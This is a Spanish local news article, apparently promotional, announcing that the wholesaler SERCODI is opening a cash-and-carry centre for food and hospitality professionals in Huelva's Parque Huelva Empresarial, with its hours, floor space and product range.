(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Domingo 03 de Julio de 2022

SERCODI abre nuevo establecimiento en el Parque Huelva Empresarial

0

La empresa SERCODI (Cash and Carry), dedicada al mundo de la alimentación y la hostelería, va a ampliar su red de establecimientos comerciales en Andalucía con la apertura de un nuevo centro en el Parque Huelva Empresarial, en Avenida de la Fresa número 6. La apertura de este nuevo centro será el miércoles 16 de marzo, con horario de 7.00 a 14.00 horas y de 16.00 a 19.30 horas, de lunes a viernes, y de 7.00 a 13.30 horas, los sábados.

Bajo el eslogan «de profesional a profesional», SERCODI lleva más de 40 años al servicio a los profesionales de la alimentación y la hostelería. Algo muy importante: Solo para profesionales. Para ser Cliente de SERCODI hay que ser empresa, persona física o jurídica y darse de alta en la web sercodi.es.

SERCODI es la gran referencia para restauradores, hosteleros, detallistas de alimentación, comerciantes..., que ahora ya tienen en SERCODI su referencia en Huelva. Su nuevo centro está en el Parque Huelva Empresarial, con 7.000 m2 de sala de ventas, diseñada para ofrecer con la mayor comodidad y un servicio integral a los profesionales de la alimentación y la hostelería.

Cuenta con más de 9.000 referencias y un equipo de profesionales expertos, preparados para hacer de su compra en SERCODI una grata experiencia.

Tal como explican desde SERCODI, «somos especialistas en formatos profesionales para hostelería, además de un amplio surtido en formatos de alimentación para que usted elija la solución más adecuada y rentable para su negocio».


En todas las categorías SERCODI ofrece primeras marcas nacionales además del respaldo «de nuestra marca propia, siempre con la mejor relación calidad-precio del mercado».

Un surtido extraordinario en una sala de ventas ordenada para una experiencia de compra ágil, fácil y cómoda.

Además, «tenemos a su disposición una sala de refrigerados con una amplia exposición de productos cárnicos, lácteos, carnes frescas y congelados».

El profesional del canal HORECA encontrará todo lo necesario para el equipamiento y abastecimiento de su negocio «en nuestras secciones de droguería, higiene personal, bebidas, artículos de servicio, menaje y complementos (celulosa, cristalería, envases cubertería, vajilla, …)»

Y todo ello con una atención personalizada, de profesional a profesional. «Nadie conoce su negocio mejor que usted, pero contamos con la experiencia y el conocimiento del sector necesarios para orientarle en su elección».

Son más de 40 años de un modelo de negocio que sitúa al cliente en el centro, haciendo del servicio y la atención personalizada una de su principales fortalezas.

SERCODI es una enseña referente en el ámbito de la distribución mayorista en Andalucía, con más de 40 años en el sector de la alimentación, droguería y bebidas, que desarrolla su actividad a través de sus 14 Cash and Carry. Toda la experiencia, el surtido y el servicio de un gran grupo orientado a los profesionales de la alimentación y la hostelería.

 

Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies